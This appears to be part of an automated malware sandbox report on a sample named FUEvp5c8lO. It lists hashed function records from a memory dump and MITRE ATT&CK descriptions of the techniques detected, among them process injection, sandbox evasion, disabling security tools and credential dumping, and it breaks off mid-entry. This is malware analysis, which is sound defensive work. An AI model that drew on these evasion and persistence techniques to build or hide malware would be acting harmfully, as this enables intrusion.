Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec653623f235043408c0f0ba49e13dad63036924ae310ae3b1c52907aa094d28
Instruction ID: 1157925a23573c1c1e838d33f99942bc1055bb9902f6b2ed89be78cd61615a0a
Opcode Fuzzy Hash: ec653623f235043408c0f0ba49e13dad63036924ae310ae3b1c52907aa094d28
Instruction Fuzzy Hash: 7901D6307083908FC797973D985062E3FE6AFCB26031544FAD149CB756DD688C06C3A2

Function 01121E90 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9630999e072c74d8cf00075ee5cc945f6f6a2db6a7b375aea21c3be8f868d0a7
Instruction ID: 0fb857f0a8a3695c0ae1dd159db5ff29a70752e607fbaf5fc68f5d0fa5bb2ba7
Opcode Fuzzy Hash: 9630999e072c74d8cf00075ee5cc945f6f6a2db6a7b375aea21c3be8f868d0a7
Instruction Fuzzy Hash: C3111E74E00208EFEB45EFB1E54479DBBB2FB88300F2081A9990563354DF355E51EB91

Function 0112B7D0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea354a52e5f78441620554525ff863e93795a81f4c2cbaaaaeb1749273d2fbbb
Instruction ID: a9d9d9c6af62cce5dfb11b485f5d66459cbea030471b36c577e85686c3f0cd1b
Opcode Fuzzy Hash: ea354a52e5f78441620554525ff863e93795a81f4c2cbaaaaeb1749273d2fbbb
Instruction Fuzzy Hash: 7DF0C271F001259F8B55EF78AC519EE7BF4EFC9214719412ED949DB312EB3189128BC2

Function 0112EECA Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92ffa5902c8a715d6617ca7d2a90edf56792deea1471238ebb7e60033cfc6af
Instruction ID: 941d00dd0b5611ba10a7f9c173d8f97dd7ca14628708fd9b420ead508348e4ce
Opcode Fuzzy Hash: a92ffa5902c8a715d6617ca7d2a90edf56792deea1471238ebb7e60033cfc6af
Instruction Fuzzy Hash: AFF0F431B001148FCF18DB68D8509DD77F2EF85354B01427AD405DB311EB329C058B81

Function 0112B138 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b687084eba017e62ce59af26bb6f557aa38f4f06368640d1ebdc4444102d2e
Instruction ID: 48d612e4dc7426d72afbd6e29a2918ca7219547efa341e03255ef81e9051c3df
Opcode Fuzzy Hash: 74b687084eba017e62ce59af26bb6f557aa38f4f06368640d1ebdc4444102d2e
Instruction Fuzzy Hash: 8201AF71E042188FCF58EFA8E8945EEBBF4FF89224B1001BAD508E7345E7355914CB94

Function 0112B6C9 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8b68adfb6528aafedcc2cd71011100a24e27df61b8bee524b98bc0eb2c9227
Instruction ID: 2f6f859908e8e23778a399e2bdade2865f138d8b8abe7143bb10bc2dc3801bf9
Opcode Fuzzy Hash: da8b68adfb6528aafedcc2cd71011100a24e27df61b8bee524b98bc0eb2c9227
Instruction Fuzzy Hash: B50181B1E042298FCB54DFA8D8806EEBBF4FF89714B14426AD508E7241EB3199058BD5

Function 0112AEB8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa94f8ecaf36d0d97ade3f2b466fc1474dbffbf183fcb8533f79aae7ed9ff41
Instruction ID: 0ca38d8a6fe1871ce79b31b92d263c085457dd5a98feb7b9ac700aec285409b1
Opcode Fuzzy Hash: 0aa94f8ecaf36d0d97ade3f2b466fc1474dbffbf183fcb8533f79aae7ed9ff41
Instruction Fuzzy Hash: 3FF0CD70E042298FCB64DFA8E8408EEBBF4FF88210B50016ED809E7355D7365A05CB92

Function 0112F13A Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee0fcab92333765259b5b6aa4cec616257c38e2d0c4cb19c289063da6a500d33
Instruction ID: 33527115f5a0c0764167494172de7322021b9a01314c09cba6af7e2d0c3c1466
Opcode Fuzzy Hash: ee0fcab92333765259b5b6aa4cec616257c38e2d0c4cb19c289063da6a500d33
Instruction Fuzzy Hash: 36F03170E0021A8F8B54DFBDD8415EEBBF4FB89214B10422AD508E7204EB3199118BD5

Function 0112E2C8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6963ec015dd6a8d1708113e573ddd4fd76995a862ae6f9ff80eb8b6c69dfdb5f
Instruction ID: 2107837f5b73a71effbd207ff6ef1eee69f0180959688d13ec00b476e5c5aee3
Opcode Fuzzy Hash: 6963ec015dd6a8d1708113e573ddd4fd76995a862ae6f9ff80eb8b6c69dfdb5f
Instruction Fuzzy Hash: 29F0AF71E002198F8BA4EFADE991AAE7BF4FF89214720016ED508EB305E7319D01CB91

Function 0112B551 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 221ea3287a572f669b9216bd356d250c9c0965e8468893a49af0bfac25fe9077
Instruction ID: fa257d0b5e1109f7e77ee88372e805f5e0ddc2714fab6eeeba1e6ac47143a340
Opcode Fuzzy Hash: 221ea3287a572f669b9216bd356d250c9c0965e8468893a49af0bfac25fe9077
Instruction Fuzzy Hash: AFF0AF70E042288F8F54DFA8A8805EE7BF4EF88224B15016AD508E7201E73599158B94

Function 01128800 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a364eadb5870f8cbe9c4cc9610fa3b9daa064343f0c7b7fe5e84358ab40c1a69
Instruction ID: bd9ae6041737923ecf1b14e66c307c5f89566433594105fcd12f060b6f2f505e
Opcode Fuzzy Hash: a364eadb5870f8cbe9c4cc9610fa3b9daa064343f0c7b7fe5e84358ab40c1a69
Instruction Fuzzy Hash: 6D012831D0475ACBDB19CFE5C85059EBBF2FF86300F21451AD504BB211EBB0A946CB50

Function 01121DFD Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c73c692473b5fe06299087064165d560cba4e17bcd8ac58e3263fb0033d5fe2
Instruction ID: 146624a30f32e5051e531d68b3707696ce165b246623d84c7d94cbb6727ba326
Opcode Fuzzy Hash: 0c73c692473b5fe06299087064165d560cba4e17bcd8ac58e3263fb0033d5fe2
Instruction Fuzzy Hash: 7701D170515350DFCB42FBB8E89059C3FB0AF46210B8007E5C0808B92AEB30AE1ACB92

Function 0112807E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e0cc87512bcad2de5ef73541fee6e8152e6f40ea72f8c926d307da26f789228
Instruction ID: 902ffbba9ace1e352a2162d5d08e5bdd46e6519b16a623509dc050278ce40090
Opcode Fuzzy Hash: 1e0cc87512bcad2de5ef73541fee6e8152e6f40ea72f8c926d307da26f789228
Instruction Fuzzy Hash: 7C014B35B00216CBCF48EBB0F4689BE77B2EB84301B558D15D942973A8DF396C02CB85

Function 01121144 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3f635c9f9e9fc03851266d2819c806196e7cf3f00cd905e9f7dd07d59abf7d0
Instruction ID: 306876651719a8acfe06ed7a912ca39aca66ca8c7d19c71dd9dad2ffb7a6fcd9
Opcode Fuzzy Hash: e3f635c9f9e9fc03851266d2819c806196e7cf3f00cd905e9f7dd07d59abf7d0
Instruction Fuzzy Hash: BBF02B393043708FCB53FB75E4100583B61AF8A2907118596C482CF319DB359D19E7C6

Function 011274B9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc00599bd3329f415a26343c997e65d9eb6862f19744d60319a1697b59d0b398
Instruction ID: 7823fdc51faf434d6366d11577517eb1969c16f52ad6f1f2fdb13da818140a37
Opcode Fuzzy Hash: dc00599bd3329f415a26343c997e65d9eb6862f19744d60319a1697b59d0b398
Instruction Fuzzy Hash: 2B014F74501390DFC785EF38D890A9A7BB5EF49300B1042A9D505CB26AEB31AD24EBA1

Function 01127539 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c066a8aca01b86d3aa26f742b484b854a3b900538922f77aeb1764f3fbbf00
Instruction ID: 47a55f49c903e46e8849123a6de749ffe3b3e7cfd5f0929ecb841704d759aadd
Opcode Fuzzy Hash: 59c066a8aca01b86d3aa26f742b484b854a3b900538922f77aeb1764f3fbbf00
Instruction Fuzzy Hash: 8DE068367021B51FC64EA36C64601BF37D69FCB034328009BD804DBB81CF20AC2687E2

Function 01127460 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6cfb5c6ea05faa3a17962cb2c46ff526078436956b0fcc44523a834c3b6ba4
Instruction ID: 771cc0aa7bcc7c4c4e34e21a94e18a4d79f4cb634c19f031190b5a52214451de
Opcode Fuzzy Hash: 5b6cfb5c6ea05faa3a17962cb2c46ff526078436956b0fcc44523a834c3b6ba4
Instruction Fuzzy Hash: 2CF0ED313000704FC70AA7B8E8209BD3BAADB876A572400ABCA05CB799DE26AC0447D2

Function 011274C8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0b3c4ea5c6d241c9f82d4a103fef169d7e13de27a701dca0790a842dfb4b6d
Instruction ID: 004d38ce6a4b0685004c042f17bd97cf67f2422b004b3ea31fd8003846a4d1d3
Opcode Fuzzy Hash: dc0b3c4ea5c6d241c9f82d4a103fef169d7e13de27a701dca0790a842dfb4b6d
Instruction Fuzzy Hash: 6CF019B4601294DFD744EF69DC41A9EBBF5EF44700B104664D509C7219DB31BD20AFE1

Function 01121E10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939b5ac682371a87fe5071408c3e814c229eded0203e5594d4e17a6ae8d14ee8
Instruction ID: d0c7b4d808a4f71855e07352874c1ee0ce85fa60ea8de0cf5d47b90e0c3fd90e
Opcode Fuzzy Hash: 939b5ac682371a87fe5071408c3e814c229eded0203e5594d4e17a6ae8d14ee8
Instruction Fuzzy Hash: 3AF08274910315DFDB41FFB9E88499C7BB5AF45200B8047A4C4449B629EF70AA15DBD1

Function 011280B1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f38ad4417df8879d3384940e321651a0f84c0a0e4ab496d340a8be3a12f218
Instruction ID: 88528b85ff715b8d4b128743eb5ccf727ceb7ad55771d526003d6c5bf944d128
Opcode Fuzzy Hash: f0f38ad4417df8879d3384940e321651a0f84c0a0e4ab496d340a8be3a12f218
Instruction Fuzzy Hash: 4AF01C35B00216CBCB18EBA0F4685BE77B2EB84341B558915D946973A8DB396C128B85

Function 011209D5 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: facf6e23a8712c36527ff761a57b77c7704b42b5e75f5b970eac8fa845d4ba97
Instruction ID: b0a0560fbf641b674b3d9dc336d63cb55fee981f81b18dee57166d93f81686b0
Opcode Fuzzy Hash: facf6e23a8712c36527ff761a57b77c7704b42b5e75f5b970eac8fa845d4ba97
Instruction Fuzzy Hash: D6E06D70708295DAFF2F27B4A4287387F72AB4A215F49025AF5CB8449BDB1784B58323

Function 01127548 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de490db524bf22e7841498fb13e06e4e70d1de20dc22d7976665db73657a9217
Instruction ID: 4c2d9eaf9f21ec73acee7aca4741868901d6547d2face9574746005b64f4304f
Opcode Fuzzy Hash: de490db524bf22e7841498fb13e06e4e70d1de20dc22d7976665db73657a9217
Instruction Fuzzy Hash: 71D02B2634217E17095C725E201017F238F8FCA474310012AE409E7740CF50AC2247D1

Function 01121718 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2400ff26bfc06f3e2d433fcd74a61af93a3122f977533b92f0ff2e90f77873e4
Instruction ID: 9c85fabb57078f60509bec558ad82de8a5a1c230f6d88143806f4aa5deb1f9c1
Opcode Fuzzy Hash: 2400ff26bfc06f3e2d433fcd74a61af93a3122f977533b92f0ff2e90f77873e4
Instruction Fuzzy Hash: BAE08C313001104F8344972EA88485ABBDAEBCA62131444BAE109C7311CEB5DC0143A0

Function 01122EE0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962ab680c8b9a0cfbfc447de56a2f1797d6fa919a8a9bcb79e8ee4742eb15c65
Instruction ID: 36f0a3467a9587a7d08a96ce4a07645eb05b70c28d2a945c84be895fb6876b1f
Opcode Fuzzy Hash: 962ab680c8b9a0cfbfc447de56a2f1797d6fa919a8a9bcb79e8ee4742eb15c65
Instruction Fuzzy Hash: 4BE09230905249EFCB42DFB4DC5148C7BF4FF0A204B1481DAD448D7356D632AE14DB92

Function 01127BE7 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca99a90c02bedcbd321b744fd7dc869e1d03601b88cb42daf63ffc8ca6a0ed2
Instruction ID: 2769be996ad564065dcec343320a5ed296b0b284e85e126216bab3b98be0eaf8
Opcode Fuzzy Hash: cca99a90c02bedcbd321b744fd7dc869e1d03601b88cb42daf63ffc8ca6a0ed2
Instruction Fuzzy Hash: BFE08C3160E2D18FCB0B9B34E8B41E57F70AE6312031A40C3C0C68B2A3E625481AC3A6

Function 01122EF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569e16b489c57c298aa249d15443457cbc5d9a904c4442bff8db288bb6c3e4eb
Instruction ID: 3c182d0a550ae2c492097f6b0c3e9d41fdf4a1b171a7553c3cfa699ed33f4fc9
Opcode Fuzzy Hash: 569e16b489c57c298aa249d15443457cbc5d9a904c4442bff8db288bb6c3e4eb
Instruction Fuzzy Hash: C5D01770A0120CEF8B80EFA5E90199DB7F9FF48204B1081AAA408D3204EA326F10AB95

Function 011280E4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8711903b1c80e7db1214f5a8beb56f25e2525181c918dd03302068f2b335db41
Instruction ID: 52b5276a5bae16777e815cde1368db852e505f82fef4283c4eb134c403afbd50
Opcode Fuzzy Hash: 8711903b1c80e7db1214f5a8beb56f25e2525181c918dd03302068f2b335db41
Instruction Fuzzy Hash: 07D0A932B00228CBCB14E7A4F8282EE3372EB84341F244461D9059B3C4EB344D228BC2

Function 011275E6 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0795362643f6f44e5264a88b548aaad8597f72383b402cf98cfbe39a9f699a
Instruction ID: 88e7ba5f20c26804f9908c3b5399789f8b9e151284b18697c98e8b8aa82e3cf3
Opcode Fuzzy Hash: fc0795362643f6f44e5264a88b548aaad8597f72383b402cf98cfbe39a9f699a
Instruction Fuzzy Hash: 25C012342001169BD616FB5AF8405A83766FB812403040268E90687584FF119860EB63

Function 01128940 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae690bbd9ff6c0bc83e8f9682701f910c18da1c6798cf45007b119eb12fd226
Instruction ID: 8d95e298f71f2d4e1376ce97eecc9507d4cd3a237800e405254ba4d0349423a6
Opcode Fuzzy Hash: 2ae690bbd9ff6c0bc83e8f9682701f910c18da1c6798cf45007b119eb12fd226
Instruction Fuzzy Hash: E1C04C344055848FCB16DF20CBA5414BB71FB5630931885D9854586766CF6BA81AEB40

Function 01120986 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471b9d60a9fcf2e46f601eff7cc196ba535446ebc333fa56a0025accdac5418e
Instruction ID: 6daa898e22599e18a95cedf052d0169125f4f629cf6adcebc6836090fe22d2a0
Opcode Fuzzy Hash: 471b9d60a9fcf2e46f601eff7cc196ba535446ebc333fa56a0025accdac5418e
Instruction Fuzzy Hash: D5C01230A14299CBFF2E1760D828B38BB23A789201F080229F2CB4014A9F2B05A48717

Function 011209A2 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2623840176.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1120000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d3c4510dfd043e6eee6cfe650a32c0ffabfc0f111eb2b7c5be7cede00130b5
Instruction ID: d32fe03b53aaa7a6f9118190e74caedad7dc986154cf8988dc45986e07646bd3
Opcode Fuzzy Hash: a4d3c4510dfd043e6eee6cfe650a32c0ffabfc0f111eb2b7c5be7cede00130b5
Instruction Fuzzy Hash: 62C01230A04259CBFF2E27A0D828738BB22AB49200F080228FACB4114AAF2B05A44317

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
